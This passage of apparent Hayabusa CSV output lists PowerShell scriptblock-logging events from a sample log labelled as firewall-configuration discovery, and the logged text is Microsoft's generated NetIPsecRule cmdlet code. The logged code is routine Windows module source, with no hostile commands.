($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values 
= @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) 
$__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 
'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
